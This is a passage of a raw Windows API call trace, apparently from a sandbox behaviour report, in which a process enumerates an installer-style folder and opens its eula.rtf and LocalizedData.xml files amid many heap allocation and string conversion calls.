Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.533] AreFileApisANSI () returned 1 [0060.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032") returned 27 [0060.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032" (normalized: "c:\\588bce7c90097ed212\\1032"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.533] GetLastError () returned 0x5 [0060.533] GetLastError () returned 0x5 [0060.533] SetLastError (dwErrCode=0x5) [0060.533] GetLastError () returned 0x5 [0060.533] SetLastError (dwErrCode=0x5) [0060.533] GetLastError () returned 0x5 [0060.533] SetLastError (dwErrCode=0x5) [0060.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.533] AreFileApisANSI () returned 1 [0060.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032") returned 27 [0060.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032" (normalized: "c:\\588bce7c90097ed212\\1032"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.534] GetLastError () returned 0x5 [0060.534] GetLastError () returned 0x5 [0060.534] SetLastError (dwErrCode=0x5) [0060.534] GetLastError () returned 0x5 [0060.534] SetLastError (dwErrCode=0x5) [0060.534] GetLastError () returned 0x5 [0060.534] SetLastError (dwErrCode=0x5) [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.534] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1033", cAlternateFileName="")) returned 1 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.534] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.612] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.633] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0060.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.634] AreFileApisANSI () returned 1 [0060.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.655] AreFileApisANSI () returned 1 [0060.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0060.655] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.656] GetFileType (hFile=0x420) returned 0x1 [0060.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.656] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.657] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.657] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.657] CloseHandle (hObject=0x420) returned 1 [0060.657] AreFileApisANSI () returned 1 [0060.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0060.657] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.657] GetFileType (hFile=0x420) returned 0x1 [0060.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.657] CloseHandle (hObject=0x420) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.658] AreFileApisANSI () returned 1 [0060.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0060.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0060.658] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac)) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.659] AreFileApisANSI () returned 1 [0060.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.660] AreFileApisANSI () returned 1 [0060.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0060.660] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.660] GetFileType (hFile=0x420) returned 0x1 [0060.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.660] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.660] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.661] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.661] CloseHandle (hObject=0x420) returned 1 [0060.661] AreFileApisANSI () returned 1 [0060.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 